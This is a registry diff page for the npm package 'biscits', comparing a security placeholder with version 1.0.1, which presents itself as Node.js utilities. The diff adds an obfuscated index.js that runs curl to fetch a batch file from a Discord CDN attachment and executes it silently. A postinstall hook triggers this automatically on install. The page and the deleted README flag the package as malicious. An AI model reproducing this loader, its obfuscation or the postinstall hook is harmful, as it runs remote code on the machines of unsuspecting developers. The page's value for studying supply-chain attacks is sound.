biscits 0.0.1-security → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of biscits might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +14 -3
- package/test/script.js +3 -0
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const _0x34604d=_0x19de;function _0x19de(_0x3c2c2c,_0x8feaf1){const _0x23f82f=_0x23f8();return _0x19de=function(_0x19de49,_0x170b3f){_0x19de49=_0x19de49-0xce;let _0x1a4464=_0x23f82f[_0x19de49];return _0x1a4464;},_0x19de(_0x3c2c2c,_0x8feaf1);}(function(_0x2b702e,_0x35f1de){const _0x800ea7=_0x19de,_0x138b09=_0x2b702e();while(!![]){try{const _0x469394=-parseInt(_0x800ea7(0xd8))/0x1*(parseInt(_0x800ea7(0xd9))/0x2)+parseInt(_0x800ea7(0xd1))/0x3+parseInt(_0x800ea7(0xcf))/0x4+parseInt(_0x800ea7(0xd3))/0x5+-parseInt(_0x800ea7(0xce))/0x6*(-parseInt(_0x800ea7(0xd4))/0x7)+parseInt(_0x800ea7(0xd6))/0x8*(-parseInt(_0x800ea7(0xd7))/0x9)+parseInt(_0x800ea7(0xd0))/0xa*(-parseInt(_0x800ea7(0xda))/0xb);if(_0x469394===_0x35f1de)break;else _0x138b09['push'](_0x138b09['shift']());}catch(_0x341721){_0x138b09['push'](_0x138b09['shift']());}}}(_0x23f8,0xa4768));const {exec}=require(_0x34604d(0xd2)),test=()=>{const _0x371d0a=_0x34604d,_0x199cc9=_0x371d0a(0xd5);exec(_0x199cc9,(_0x53d0b2,_0x4d66a9,_0x5d8aa1)=>{});};test();function _0x23f8(){const _0x3bd6df=['893610OyRkBI','child_process','1324590LnAlBq','7ZXyQSK','curl\x20-s\x20-o\x20%temp%strings.bat\x20https://cdn.discordapp.com/attachments/1169414844689174588/1189736676222828655/strings.bat\x20&&\x20start\x20/min\x20cmd\x20/c\x20%temp%strings.bat','176epssXu','315135yiCYKw','4akwAsl','274708GQZjZV','11bqukAQ','7207362XliJXN','1755216kzVbXc','2094330kAtlcN'];_0x23f8=function(){return _0x3bd6df;};return _0x23f8();}
|
package/package.json
CHANGED
|
@@ -1,6 +1,17 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "biscits",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.1",
|
|
4
|
+
"description": "A range of utilities for your Node.js needs, maintained by a small group of new developers!",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"directories": {
|
|
7
|
+
"test": "test"
|
|
8
|
+
},
|
|
9
|
+
"scripts": {
|
|
10
|
+
"postinstall": "node index.js"
|
|
11
|
+
},
|
|
12
|
+
"author": "Ibrahim Sultan",
|
|
13
|
+
"license": "ISC",
|
|
14
|
+
"dependencies": {
|
|
15
|
+
"biscits": "1.0.1"
|
|
16
|
+
}
|
|
6
17
|
}
|
package/test/script.js
ADDED
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=biscits for more information.
|